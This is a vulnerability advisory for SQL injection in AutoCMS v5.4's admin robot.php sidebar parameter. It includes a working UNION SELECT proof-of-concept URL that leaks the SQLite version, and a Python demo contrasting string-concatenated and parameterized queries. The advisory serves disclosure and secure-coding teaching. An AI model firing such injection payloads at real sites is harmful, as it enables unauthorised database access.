Summary
AutoCMS v5.4 suffers from a SQL Injection vulnerability that can be exploited by an attacker with administrative privileges to execute arbitrary SQLite statements.
Details
The vulnerability is present in the sidebar parameter of the /admin/robot.php endpoint. An attacker with administrative privileges can leverage this issue to execute arbitrary SQLite statements on the database.
The following URL demonstrates the vulnerability by outputting the SQLite version: http://target-ip/admin/robot.php?edit=default&sidebar=-1' AND 1=2 UNION SELECT 1758999520,2,sqlite_version(),4,5 --
When this URL is accessed, the SQL injection payload is executed, and the server returns a page that includes the SQLite version information. The payload uses the UNION SELECT statement to retrieve the version, and the -- at the end comments out the rest of the original query, allowing the injected code to execute successfully.
POC
http://target-ip/admin/robot.php?edit=default&sidebar=-1' AND 1=2 UNION SELECT 1758999520,2,sqlite_version(),4,5 --
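The following Python sketch is an added example, not AutoCMS's own code: it models the pattern behind this report (an untrusted request parameter concatenated into an SQLite query) next to the parameterized form that closes it, using a constructed five-column table so the reported payload's column count lines up. The table name, columns and rows are assumptions made for the demonstration.

```python
import sqlite3

# Constructed stand-in for the application's sidebar lookup (not AutoCMS's
# schema): five columns, matching the five values the reported payload supplies.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sidebar (id INTEGER, name TEXT, body TEXT, "
               "position INTEGER, active INTEGER)")
    db.executemany("INSERT INTO sidebar VALUES (?,?,?,?,?)",
                   [(1, "default", "Links", 1, 1),
                    (2, "news", "Latest posts", 2, 1)])
    return db

def lookup_vulnerable(db, sidebar):
    # String concatenation: the request value becomes part of the SQL text,
    # so a closing quote, a UNION and a trailing comment are parsed as SQL.
    sql = "SELECT * FROM sidebar WHERE name = '" + sidebar + "'"
    return db.execute(sql).fetchall()

def lookup_fixed(db, sidebar):
    # Bound parameter: the same value is only ever compared as data.
    return db.execute("SELECT * FROM sidebar WHERE name = ?",
                      (sidebar,)).fetchall()

# Exactly the value the report sends in the sidebar parameter.
PAYLOAD = "-1' AND 1=2 UNION SELECT 1758999520,2,sqlite_version(),4,5 --"

def engine_version():
    # Version string of the linked SQLite library, what sqlite_version() returns.
    return sqlite3.sqlite_version

def demo():
    db = make_db()
    # Vulnerable path: the real WHERE clause matches nothing (1=2), and the
    # UNION row carries sqlite_version() back in the third column.
    leaked = lookup_vulnerable(db, PAYLOAD)
    # Fixed path: no row is named after the payload string, so nothing returns.
    safe = lookup_fixed(db, PAYLOAD)
    return leaked, safe

if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable query returned:", leaked)
    print("parameterized query returned:", safe)
```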